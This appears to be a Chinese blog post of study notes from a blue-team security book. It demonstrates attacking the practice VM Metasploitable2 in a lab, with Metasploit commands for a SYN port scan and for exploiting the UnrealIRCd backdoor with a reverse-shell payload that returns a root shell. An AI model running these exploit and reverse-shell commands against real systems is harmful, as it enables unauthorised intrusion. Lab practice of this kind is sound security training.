目录

第10章-metasploit网络安全防御实战-蓝军武器库

目录

第10章 metasploit(网络安全防御实战–蓝军武器库)

https://i-blog.csdnimg.cn/direct/1233005ba7724e82a9d741545612f1a9.png

防御实战–蓝军武器库是2020年出版的,已经过去3年时间了,最近利用闲暇时间,抓紧吸收,总的来说,第10章开始学习利用metasploit 去打metasploit2虚拟机,本文我演示了metasploit 和漏洞利用,更多有趣的渗透测试实验,有待大家挖掘~

https://i-blog.csdnimg.cn/img_convert/dbf40575180739b349c6aad77de3a108.jpeg

ailx10

网络安全优秀回答者

互联网行业 安全攻防员

去咨询

1、启动metasploitable2 ,拿到IP地址(192.168.85.171)

https://i-blog.csdnimg.cn/img_convert/fbd5ff0b0b0e2f229a20ff2531e0f868.png

2、访问web页面,里面有很多 练习的靶场

https://i-blog.csdnimg.cn/img_convert/2bccf22ab221dd8b49c6b5679d700b62.png

3、使用root 身份 运行 kali 的 msfconsole ,对metasploitable2进行syn端口扫描

search portscan
use auxiliary/scanner/portscan/syn
set RHOSTS 192.168.85.171

https://i-blog.csdnimg.cn/img_convert/f2ab578b46bca2f2cab7c158af4e5dc9.png

4、查看syn端口扫描结果,体验很慢,不如

https://i-blog.csdnimg.cn/img_convert/1af2e784a6ea4579398ae12b85277e1e.png

5、漏洞利用,直接帮忙提权到root了,成功获得metasploitable2 后门

use exploit/unix/irc/unreal_ircd_3281_backdoor

set RHOSTS 192.168.85.171
set payload generic/shell_reverse_tcp
set payload cmd/unix/reverse
set lhost 192.168.85.23
run

https://i-blog.csdnimg.cn/img_convert/07684a69576cc7034fcfe89859c027e1.png

编辑于 2023-03-24 21:47・IP 属地江苏